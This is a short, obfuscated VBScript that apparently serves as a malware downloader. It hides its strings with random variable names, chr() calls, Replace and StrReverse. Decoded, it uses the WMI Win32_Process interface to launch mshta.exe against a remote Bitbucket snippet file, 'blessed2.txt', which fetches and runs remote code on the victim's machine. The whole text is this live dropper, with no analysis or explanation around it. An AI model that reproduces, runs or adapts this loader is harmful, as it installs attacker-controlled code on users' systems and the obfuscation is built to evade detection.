
XLTBBPKJHDHVGOOGZAIARH = ""&chr(51)&"n"+"i"&chr(119)&""
ZHBHYRTQWCXKDKWIHVXISW = Replace("2"+XLTBBPKJHDHVGOOGZAIARH+"WWWVHKBTHAYNEZVYSDLNVGt","WWWVHKBTHAYNEZVYSDLNVG",":"&chr(115)&"")
LURLTBIPCLDIFFQPTOIHGD = Replace("rIBAEEVGEXLIEXBQDYVYKVS_"+ZHBHYRTQWCXKDKWIHVXISW+""&chr(77)&"","IBAEEVGEXLIEXBQDYVYKVS",""&chr(80)&"")
WRDVJJYPVXCAESPXBUASQP = Replace("GLSFIZHQWSNCELJZBIUBDF"+LURLTBIPCLDIFFQPTOIHGD+"g"&chr(77)&"","GLSFIZHQWSNCELJZBIUBDF","o")
ZPXLURAJQTKATQAILXTJHC = Replace("NLOAIHSZKBPQVTIWUVKXSC"+WRDVJJYPVXCAESPXBUASQP+"ni","NLOAIHSZKBPQVTIWUVKXSC",""&chr(69)&"c")
KVJIQPPQZVDDOIWEYWFPZD = ""&chr(69)&".a"&chr(116)&""
UPJPWFCBJHCBVVVNRPEQPH = ""&chr(88)&""+KVJIQPPQZVDDOIWEYWFPZD+"h"
EJDLUIGRCRWZDRZDIZRCLR = ""&chr(69)&""
set XLPRTUBUUZISUQSFPHOODS = GetObject(Replace(StrReverse("GCDTROYQSVFAYAOWUZGGQHGCDTROYQSVFAYAOWUZGGQH"+ZPXLURAJQTKATQAILXTJHC+"w"),"HQGGZUWOAYAFVSQYORTDCG",""&chr(115)&""))
KBVZBDPGJWKRHUCLEKTBVZ = XLPRTUBUUZISUQSFPHOODS.Create (Replace(StrReverse(" "+EJDLUIGRCRWZDRZDIZRCLR+""+UPJPWFCBJHCBVVVNRPEQPH+"sQQYESDNIWJKZBQGYNZYXCV"),"VCXYZNYGQBZKJWINDSEYQQ",""&chr(77)&"")+Replace(StrReverse("txt.2desselbxZTRRWJHAARNSUZIIKYYVJUselifZTRRWJHAARNSUZIIKYYVJU237c12839cc63ed53f3222f0b32c14d7d1bd687dZTRRWJHAARNSUZIIKYYVJUB7y4MLZTRRWJHAARNSUZIIKYYVJUorpynitZTRRWJHAARNSUZIIKYYVJUsteppinsZTRRWJHAARNSUZIIKYYVJU0.2ZTRRWJHAARNSUZIIKYYVJUipa!ZTRRWJHAARNSUZIIKYYVJUgro.tekcubtibZTRRWJHAARNSUZIIKYYVJUZTRRWJHAARNSUZIIKYYVJU:sptth"),"UJVYYKIIZUSNRAAHJWRRTZ","/"),null,null,processid)
